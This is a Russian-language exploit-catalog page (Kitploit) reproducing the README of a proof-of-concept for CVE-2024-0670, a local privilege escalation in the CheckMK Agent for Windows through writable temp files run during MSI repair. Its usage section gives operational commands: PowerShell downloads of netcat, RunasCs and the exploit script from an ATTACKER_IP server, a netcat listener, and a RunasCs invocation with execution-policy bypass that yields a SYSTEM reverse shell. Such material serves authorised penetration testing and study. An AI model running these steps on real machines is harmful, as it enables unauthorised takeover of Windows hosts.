Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Этот репозиторий содержит демонстрацию эксплуатации уязвимости CVE-2024-0670 — локального повышения привилегий в CheckMK Agent для Windows. Уязвимость позволяет пользователю с низкими привилегиями получить привилегии SYSTEM путем злоупотребления записываемыми путями к файлам, обрабатываемыми механизмом восстановления MSI. | Kitploit
Инструменты/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHub

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот репозиторий содержит демонстрацию эксплуатации уязвимости CVE-2024-0670 — локального повышения привилегий в CheckMK Agent для Windows. Уязвимость позволяет пользователю с низкими привилегиями получить привилегии SYSTEM путем злоупотребления записываемыми путями к файлам, обрабатываемыми механизмом восстановления MSI.

elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Репозиторий
31610 месяцев назадЕщё не проверено
Поделиться

CVE-2024-0670 – Локальное повышение привилегий агента CheckMK (PoC)

Этот репозиторий содержит простую и чистую proof-of-concept для CVE-2024-0670 — уязвимости локального повышения привилегий в агенте CheckMK для Windows. Пользователь с низкими привилегиями может получить права SYSTEM, злоупотребив записываемыми временными файлами, которые выполняются во время восстановления MSI.

🔍 Сводка уязвимости

  • Vendor: Tribe29
  • CVE: CVE-2024-0670
  • Advisory: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Во время восстановления MSI CheckMK выполняет файлы из:

  C:\Windows\Temp\

Если обычный пользователь может поместить туда файлы с предсказуемыми именами, он может выполнять команды от имени NT AUTHORITY\SYSTEM.

Этот эксплойт подставляет несколько имен файлов с полезной нагрузкой и запускает восстановление MSI для получения выполнения от имени SYSTEM.

📂 Файлы

RunasCs.exe     → замена runas (поддержка пароля в открытом виде)
nc.exe          → Netcat (обратная оболочка)
exploit.ps1     → скрипт эксплойта CVE-2024-0670
README.md       → документация

🛠 Требования

  • Пользователь Windows с низкими привилегиями
  • Включённый PowerShell
  • Установленный агент CheckMK для Windows
  • Возможность загрузки файлов
  • Python (для простого HTTP-сервера)
  • Слушатель Netcat на машине атакующего

📡 Запуск HTTP-сервера

  C:\Windows\Temp\

📥 Загрузка инструментов на цель

Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Запуск эксплойта

Запустите слушатель на своей машине:

nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

В случае успеха вы получите обратную оболочку с правами SYSTEM.

🔧 Сборка RunasCs вручную (опционально)

net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Юридическое предупреждение

Этот проект предназначен только для образовательных целей и санкционированного тестирования на проникновение. Не используйте его в незаконных целях. Автор не несёт ответственности за неправильное использование.

Скачать инструмент